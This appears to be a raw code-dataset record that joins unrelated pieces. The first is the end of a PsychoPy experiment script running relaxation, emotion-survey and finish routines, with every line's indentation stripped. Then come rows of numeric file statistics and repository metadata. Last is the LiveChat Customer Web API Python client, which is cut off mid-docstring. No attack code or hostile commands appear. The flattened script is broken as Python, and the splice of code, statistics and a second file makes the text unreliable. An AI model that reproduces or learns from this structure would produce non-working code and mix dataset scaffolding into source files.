thisExp.addLoop(task_relax_loop) # add the loop to the experiment
thisTask_relax_loop = task_relax_loop.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTask_relax_loop.rgb)
if thisTask_relax_loop != None:
for paramName in thisTask_relax_loop.keys():
exec(paramName + '= thisTask_relax_loop.' + paramName)
relax_repeat = 0
for thisTask_relax_loop in task_relax_loop:
currentLoop = task_relax_loop
# abbreviate parameter names if possible (e.g. rgb = thisTask_relax_loop.rgb)
if thisTask_relax_loop != None:
for paramName in thisTask_relax_loop.keys():
exec(paramName + '= thisTask_relax_loop.' + paramName)
# ------Prepare to start Routine "relax"-------
t = 0
relaxClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
relax_key = event.BuilderKeyResponse()
relax_image.setImage("Instructions/png/r-%s.png"%(relax_repeat))
relax_sound.setSound("Instructions/wav/r-%s.wav"%(relax_repeat))
# keep track of which components have finished
relaxComponents = [relax_image, relax_key, relax_sound]
for thisComponent in relaxComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# ------Prepare to start Routine "relax"-------
t = 0
relaxClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
relax_key = event.BuilderKeyResponse()
relax_image.setImage("Instructions/png/r-%s.png"%(relax_repeat))
relax_sound.setSound("Instructions/wav/r-%s.wav"%(relax_repeat))
# keep track of which components have finished
relaxComponents = [relax_image, relax_key, relax_sound]
for thisComponent in relaxComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "relax"-------
while continueRoutine:
# get current time
t = relaxClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *relax_image* updates
if t >= 0.0 and relax_image.status == NOT_STARTED:
# keep track of start time/frame for later
relax_image.tStart = t
relax_image.frameNStart = frameN # exact frame index
relax_image.setAutoDraw(True)
# *relax_key* updates
if t >= 0.0 and relax_key.status == NOT_STARTED:
# keep track of start time/frame for later
relax_key.tStart = t
relax_key.frameNStart = frameN # exact frame index
relax_key.status = STARTED
# keyboard checking is just starting
event.clearEvents(eventType='keyboard')
if relax_key.status == STARTED:
theseKeys = event.getKeys(keyList=['space'])
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
# a response ends the routine
continueRoutine = False
# start/stop relax_sound
if t >= 0.0 and relax_sound.status == NOT_STARTED:
# keep track of start time/frame for later
relax_sound.tStart = t
relax_sound.frameNStart = frameN # exact frame index
relax_sound.play() # start the sound (it finishes automatically)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in relaxComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "relax"-------
for thisComponent in relaxComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
relax_sound.stop() # ensure sound has stopped at end of routine
relax_repeat = relax_repeat+1
# the Routine "relax" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
task_survey_loop = data.TrialHandler(nReps=7, method='random',
extraInfo=expInfo, originPath=-1,
trialList=[None],
seed=None, name='survey_loop')
thisExp.addLoop(task_survey_loop) # add the loop to the experiment
thisTask_survey_loop = task_survey_loop.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTask_survey_loop.rgb)
if thisTask_survey_loop != None:
for paramName in thisTask_survey_loop.keys():
exec(paramName + '= thisTask_survey_loop.' + paramName)
#reset survey
lsurvey = ['anger','discomfort','disgust','fear','happiness','interest','sadness']#list of questions types
random.shuffle(lsurvey)
print(lsurvey)
for thisTask_survey_loop in task_survey_loop:
currentLoop = task_survey_loop
# abbreviate parameter names if possible (e.g. rgb = thisTask_survey_loop.rgb)
if thisTask_survey_loop != None:
for paramName in thisTask_survey_loop.keys():
exec(paramName + '= thisTask_survey_loop.' + paramName)
# ------Prepare to start Routine "survey"-------
t = 0
surveyClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
surveyType = lsurvey.pop(0)
survey_image.setImage("Instructions/png/%s.png"%(surveyType))
survey_key = event.BuilderKeyResponse()
# keep track of which components have finished
surveyComponents = [survey_image, survey_key]
for thisComponent in surveyComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "survey"-------
while continueRoutine:
# get current time
t = surveyClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *survey_image* updates
if t >= 0.0 and survey_image.status == NOT_STARTED:
# keep track of start time/frame for later
survey_image.tStart = t
survey_image.frameNStart = frameN # exact frame index
survey_image.setAutoDraw(True)
# *survey_key* updates
if t >= 0.0 and survey_key.status == NOT_STARTED:
# keep track of start time/frame for later
survey_key.tStart = t
survey_key.frameNStart = frameN # exact frame index
survey_key.status = STARTED
# keyboard checking is just starting
win.callOnFlip(survey_key.clock.reset) # t=0 on next screen flip
event.clearEvents(eventType='keyboard')
if survey_key.status == STARTED:
theseKeys = event.getKeys(keyList=numpad_list)
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
if survey_key.keys == []: # then this was the first keypress
survey_key.keys = theseKeys[0] # just the first key pressed
survey_key.rt = survey_key.clock.getTime()
# a response ends the routine
continueRoutine = False
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in surveyComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "survey"-------
for thisComponent in surveyComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# check responses
if survey_key.keys in ['', [], None]: # No response was made
survey_key.keys=None
task_survey_loop.addData('survey_key.keys',survey_key.keys)
if survey_key.keys != None: # we had a response
task_survey_loop.addData('survey_key.rt', survey_key.rt)
# the Routine "survey" was not non-slip safe, so reset the non-slip timer
task_survey_loop.addData('surveyType', surveyType)
task_survey_loop.addData('blockType', blockType[0])
routineTimer.reset()
thisExp.nextEntry()
print(survey_key.keys)
blockNum = blockNum + 1
# completed 5 repeats of 'task_block'
# ------Prepare to start Routine "Finish"-------
t = 0
FinishClock.reset() # clock
frameN = -1
continueRoutine = True
routineTimer.add(15.000000)
# update component parameters for each repeat
finish_sound.setSound("Instructions/wav/finish-0.wav")
# keep track of which components have finished
FinishComponents = [finish_image, finish_sound]
for thisComponent in FinishComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "Finish"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = FinishClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *finish_image* updates
if t >= 0.0 and finish_image.status == NOT_STARTED:
# keep track of start time/frame for later
finish_image.tStart = t
finish_image.frameNStart = frameN # exact frame index
finish_image.setAutoDraw(True)
frameRemains = 0.0 + 15- win.monitorFramePeriod * 0.75 # most of one frame period left
if finish_image.status == STARTED and t >= frameRemains:
finish_image.setAutoDraw(False)
# start/stop finish_sound
if t >= 0.0 and finish_sound.status == NOT_STARTED:
# keep track of start time/frame for later
finish_sound.tStart = t
finish_sound.frameNStart = frameN # exact frame index
finish_sound.play() # start the sound (it finishes automatically)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in FinishComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "Finish"-------
for thisComponent in FinishComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
finish_sound.stop() # ensure sound has stopped at end of routine
# these shouldn't be strictly necessary (should auto-save)
thisExp.saveAsWideText(filename+'.csv')
thisExp.saveAsPickle(filename)
logging.flush()
# make sure everything is closed down
thisExp.abort() # or data files will save again on exit
win.close()
core.quit()
| 43.84965
| 110
| 0.624735
| 7,467
| 62,705
| 5.135931
| 0.064819
| 0.003129
| 0.017523
| 0.003781
| 0.867718
| 0.852829
| 0.847093
| 0.818801
| 0.787014
| 0.784276
| 0
| 0.01245
| 0.2865
| 62,705
| 1,429
| 111
| 43.880336
| 0.844725
| 0.29146
| 0
| 0.765263
| 0
| 0
| 0.053797
| 0.015088
| 0
| 0
| 0.000138
| 0
| 0
| 0
| null | null | 0
| 0.007368
| null | null | 0.010526
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2107472ec7c6980119503f82549599a56180004b
| 58,994
|
py
|
Python
|
livechat/customer/web/client.py
|
livechat/lc-sdk-python
|
536483590b9600ef1bc86fe36a1f810368b85a9d
|
[
"Apache-2.0"
] | 5
|
2021-03-22T19:22:05.000Z
|
2022-01-18T13:38:22.000Z
|
livechat/customer/web/client.py
|
livechat/lc-sdk-python
|
536483590b9600ef1bc86fe36a1f810368b85a9d
|
[
"Apache-2.0"
] | 5
|
2021-10-05T14:44:33.000Z
|
2022-02-16T07:33:51.000Z
|
livechat/customer/web/client.py
|
livechat/lc-sdk-python
|
536483590b9600ef1bc86fe36a1f810368b85a9d
|
[
"Apache-2.0"
] | null | null | null |
''' Customer Web client implementation. '''
# pylint: disable=W0613,R0913,W0622,C0103
from __future__ import annotations
import typing
from abc import ABCMeta
import httpx
from livechat.utils.helpers import prepare_payload
from livechat.utils.httpx_logger import HttpxLogger
# pylint: disable=R0903
class CustomerWeb:
''' Allows retrieval of client for specific Customer Web
API version. '''
@staticmethod
def get_client(license_id: int = None,
access_token: str = None,
version: str = '3.3',
base_url: str = 'api.livechatinc.com',
http2: bool = False,
organization_id: str = None) -> CustomerWebInterface:
''' Returns client for specific API version.
Args:
license_id (int): License ID. Required to use API v3.3.
token (str): Full token with type (Bearer/Basic) that will be
used as `Authorization` header in requests to API.
version (str): API's version. Defaults to `3.3`.
base_url (str): API's base url. Defaults to `api.livechatinc.com`.
http2 (bool): A boolean indicating if HTTP/2 support should be
enabled. Defaults to `False`.
organization_id (str): Organization ID, replaced license ID in v3.4.
Returns:
API client object for specified version based on
`CustomerWebApiInterface`.
Raises:
ValueError: If the specified version does not exist.
'''
client = {'3.3': CustomerWeb33, '3.4': CustomerWeb34}.get(version)
client_kwargs = {
'3.3': {
'license_id': license_id,
'access_token': access_token,
'version': version,
'url': base_url,
'http2': http2
},
'3.4': {
'organization_id': organization_id,
'access_token': access_token,
'version': version,
'url': base_url,
'http2': http2
}
}.get(version)
if client:
return client(**client_kwargs)
raise ValueError('Provided version does not exist.')
class CustomerWebInterface(metaclass=ABCMeta):
''' Main class containing API methods. '''
def __init__(self, access_token: str, version: str, base_url: str,
http2: bool) -> CustomerWebInterface:
logger = HttpxLogger()
self.api_url = f'https://{base_url}/v{version}/customer/action'
if all([access_token, isinstance(access_token, str)]):
self.session = httpx.Client(
http2=http2,
headers={'Authorization': access_token},
event_hooks={
'request': [logger.log_request],
'response': [logger.log_response]
})
else:
raise ValueError(
'Incorrect or missing `access_token` argument (should be of type str.)'
)
self.query_string = None # overwritten in concrete classes.
def modify_header(self, header: dict) -> None:
''' Modifies provided header in session object.
Args:
header (dict): Header which needs to be modified.
'''
self.session.headers.update(header)
def remove_header(self, key: str) -> None:
''' Removes provided header from session object.
Args:
key (str): Key which needs to be removed from the header.
'''
if key in self.session.headers:
del self.session.headers[key]
def get_headers(self) -> dict:
''' Returns current header values in session object.
Returns:
dict: Response which presents current header values in session object.
'''
return dict(self.session.headers)
# Chats
def list_chats(self,
limit: int = None,
sort_order: str = None,
page_id: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns summaries of the chats a Customer participated in.
Args:
limit (int): Limit of results per page. Default: 10, maximum: 25.
sort_order (str): Possible values: asc, desc (default).
Chat summaries are sorted by the creation date of its last thread.
page_id (str): ID of the page with paginated results.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/list_chats{self.query_string}',
json=payload,
headers=headers)
def list_threads(self,
chat_id: str = None,
limit: str = None,
sort_order: str = None,
page_id: str = None,
min_events_count: int = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns threads that the current Customer has access to in a given chat.
Args:
chat_id (str): ID of the chat for which threads are to be listed.
limit (str): Limit of results per page. Default: 10, maximum: 25.
sort_order (str): Possible values: asc, desc (default).
Chat summaries are sorted by the creation date of its last thread.
page_id (str): ID of the page with paginated results.
min_events_count (int): Range: 1-100;
Specifies the minimum number of events to be returned in the response.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/list_threads{self.query_string}',
json=payload,
headers=headers)
def get_chat(self,
chat_id: str = None,
thread_id: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns a thread that the current Customer has access to in a given chat.
Args:
chat_id (str): ID of the chat for which thread is to be returned.
thread_id (str): ID of the thread to show. Default: the latest thread (if exists)
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(f'{self.api_url}/get_chat{self.query_string}',
json=payload,
headers=headers)
def start_chat(self,
chat: dict = None,
active: bool = None,
continuous: bool = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Starts a chat.
Args:
chat (dict): Dict containing chat properties, access and thread.
active (bool): When set to False, creates an inactive thread; default: True.
continuous (bool): Starts chat as continuous (online group is not required); default: False.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/start_chat{self.query_string}',
json=payload,
headers=headers)
def resume_chat(self,
chat: dict = None,
active: bool = None,
continuous: bool = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Restarts an archived chat.
Args:
chat (dict): Dict containing chat properties, access and thread.
active (bool): When set to False, creates an inactive thread; default: True.
continuous (bool): Starts chat as continuous (online group is not required); default: False.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/resume_chat{self.query_string}',
json=payload,
headers=headers)
def deactivate_chat(self,
id: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Deactivates a chat by closing the currently open thread.
Sending messages to this thread will no longer be possible.
Args:
id (str): ID of chat to be deactivated.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/deactivate_chat{self.query_string}',
json=payload,
headers=headers)
# Configuration
def get_dynamic_configuration(self,
group_id: int = None,
url: str = None,
channel_type: str = None,
test: bool = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns the dynamic configuration of a given group.
It provides data to call Get Configuration and Get Localization.
Args:
group_id (int): The ID of the group that you want to get a dynamic configuration for. ID of the default group is used if not provided.
url (str): The URL that you want to get a dynamic configuration for.
channel_type (str): The channel type that you want to get a dynamic configuration for.
test (bool): Treats a dynamic configuration request as a test.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/get_dynamic_configuration{self.query_string}',
json=payload,
headers=headers)
def get_configuration(self,
group_id: int = None,
version: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns the configuration of a given group in a given version. Contains data based on which the Chat Widget can be built.
Args:
group_id (int): The ID of the group that you want to get a configuration for.
version (str): The version that you want to get a configuration for.
Returned from Get Dynamic Configuration as the config_version parameter.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/get_configuration{self.query_string}',
json=payload,
headers=headers)
# Events
def send_event(self,
chat_id: str = None,
event: dict = None,
attach_to_last_thread: bool = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Sends an Event object. Use this method to send a message by specifying the Message event type in the request.
The method updates the requester's `events_seen_up_to` as if they've seen all chat events.
Args:
chat_id (int): ID of the chat that you to send a message to.
event (dict): The event object.
attach_to_last_thread (bool): The flag is ignored for active chats.
For inactive chats:
True – the event will be added to the last thread;
False – the request will fail. Default: False.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/send_event{self.query_string}',
json=payload,
headers=headers)
def upload_file(self,
file: typing.BinaryIO = None,
headers: dict = None) -> httpx.Response:
''' Uploads a file to the server as a temporary file. It returns a URL that expires after 24 hours unless the URL is used in `send_event`.
Args:
file (typing.BinaryIO): File-like object with file to upload (Maximum size: 10MB).
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
return self.session.post(
f'{self.api_url}/upload_file{self.query_string}',
content=file.read(),
headers=headers)
def send_rich_message_postback(self,
chat_id: str = None,
event_id: str = None,
postback: dict = None,
thread_id: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Sends a rich message postback.
Args:
chat_id (str): ID of the chat to send rich message postback to.
event_id (str): ID of the event related to the rich message postback.
postback (dict): Object containing postback data (id, toggled).
thread_id (str): ID of the thread to send rich message postback to.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/send_rich_message_postback{self.query_string}',
json=payload,
headers=headers)
def send_sneak_peek(self,
chat_id: str = None,
sneak_peek_text: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Sends a sneak peek to a chat.
Args:
chat_id (str): ID of the chat to send a sneak peek to.
sneak_peek_text (str): Sneak peek text.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/send_sneak_peek{self.query_string}',
json=payload,
headers=headers)
# Localization
def get_localization(self,
group_id: int = None,
language: str = None,
version: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns the localization of a given language and group in a given version. Contains translated phrases for the Chat Widget.
Args:
group_id (int): ID of the group that you want to get a localization for.
language (str): The language that you want to get a localization for.
version (str): The version that you want to get a localization for.
Returned from `get_dynamic_configuration` as the `localization_version` parameter.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/get_localization{self.query_string}',
json=payload,
headers=headers)
# Properties
def update_chat_properties(self,
id: str = None,
properties: dict = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Updates chat properties.
Args:
id (str): ID of the chat you to set a property for.
properties (dict): Chat properties to set.
You should stick to the general properties format and include namespace, property name and value.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/update_chat_properties{self.query_string}',
json=payload,
headers=headers)
def delete_chat_properties(self,
id: str = None,
properties: dict = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Deletes chat properties.
Args:
id (str): ID of the chat you want to delete properties of.
properties (dict): Chat properties to delete.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/delete_chat_properties{self.query_string}',
json=payload,
headers=headers)
def update_thread_properties(self,
chat_id: str = None,
thread_id: str = None,
properties: dict = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Updates chat thread properties.
Args:
chat_id (str): ID of the chat you to set properties for.
thread_id (str): ID of the thread you want to set properties for.
properties (dict): Thread properties to set.
You should stick to the general properties format and include namespace, property name and value.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/update_thread_properties{self.query_string}',
json=payload,
headers=headers)
def delete_thread_properties(self,
chat_id: str = None,
thread_id: str = None,
properties: dict = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Deletes chat thread properties.
Args:
chat_id (str): ID of the chat you want to delete the properties of.
thread_id (str): ID of the thread you want to delete the properties of.
properties (dict): Thread properties to delete.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/delete_thread_properties{self.query_string}',
json=payload,
headers=headers)
def update_event_properties(self,
chat_id: str = None,
thread_id: str = None,
event_id: str = None,
properties: dict = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Updates event properties.
Args:
chat_id (str): ID of the chat you to set properties for.
thread_id (str): ID of the thread you want to set properties for.
event_id (str): ID of the event you want to set properties for.
properties (dict): Thread properties to set.
You should stick to the general properties format and include namespace, property name and value.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/update_event_properties{self.query_string}',
json=payload,
headers=headers)
def delete_event_properties(self,
chat_id: str = None,
thread_id: str = None,
event_id: str = None,
properties: dict = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Deletes event properties.
Args:
chat_id (str): ID of the chat you to delete the properties for.
thread_id (str): ID of the thread you want to delete the properties for.
event_id (str): ID of the event you want to delete the properties for.
properties (dict): Event properties to delete.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/delete_event_properties{self.query_string}',
json=payload,
headers=headers)
def list_license_properties(self,
namespace: str = None,
name: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns the properties of a given license. It only returns the properties a Customer has access to.
Args:
namespace (str): Property namespace to retrieve.
name (str): Property name.
payload (dict): Custom payload to be used as request's data.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = {}
params = {}
if namespace:
params['namespace'] = namespace
if name:
params['name'] = name
return self.session.post(f'{self.api_url}/list_license_properties',
json=payload,
params=params,
headers=headers)
def list_group_properties(self,
group_id: int = None,
namespace: str = None,
name: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns the properties of a given group. It only returns the properties a Customer has access to.
Args:
group_id (int): ID of the group you want to return the properties of.
namespace (str): Property namespace to retrieve.
name (str): Property name.
payload (dict): Custom payload to be used as request's data.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = {}
params = {}
if namespace:
params['namespace'] = namespace
if name:
params['name'] = name
if group_id:
params['id'] = str(group_id)
return self.session.post(f'{self.api_url}/list_group_properties',
json=payload,
params=params,
headers=headers)
# Customers
def get_customer(self,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns the info about the Customer requesting it.
Args:
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
return self.session.post(
f'{self.api_url}/get_customer{self.query_string}',
json={} if payload is None else payload,
headers=headers)
def update_customer(self,
name: str = None,
email: str = None,
avatar: str = None,
session_fields: list = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Updates Customer's properties.
Args:
name (str): Name of the customer.
email (str): Email of the customer.
avatar (str): The URL of the Customer's avatar.
session_fields (list): An array of custom object-enclosed key:value pairs.
Respects the order of items.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/update_customer{self.query_string}',
json=payload,
headers=headers)
def set_customer_session_fields(self,
session_fields: list = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Updates Customer's session fields.
Args:
session_fields (list): An array of custom object-enclosed key:value pairs.
Respects the order of items. Max keys: 100.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/set_customer_session_fields{self.query_string}',
json=payload,
headers=headers)
# Status
def list_group_statuses(self,
all: bool = None,
group_ids: list = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns object with info about current routing statuses of agent groups.
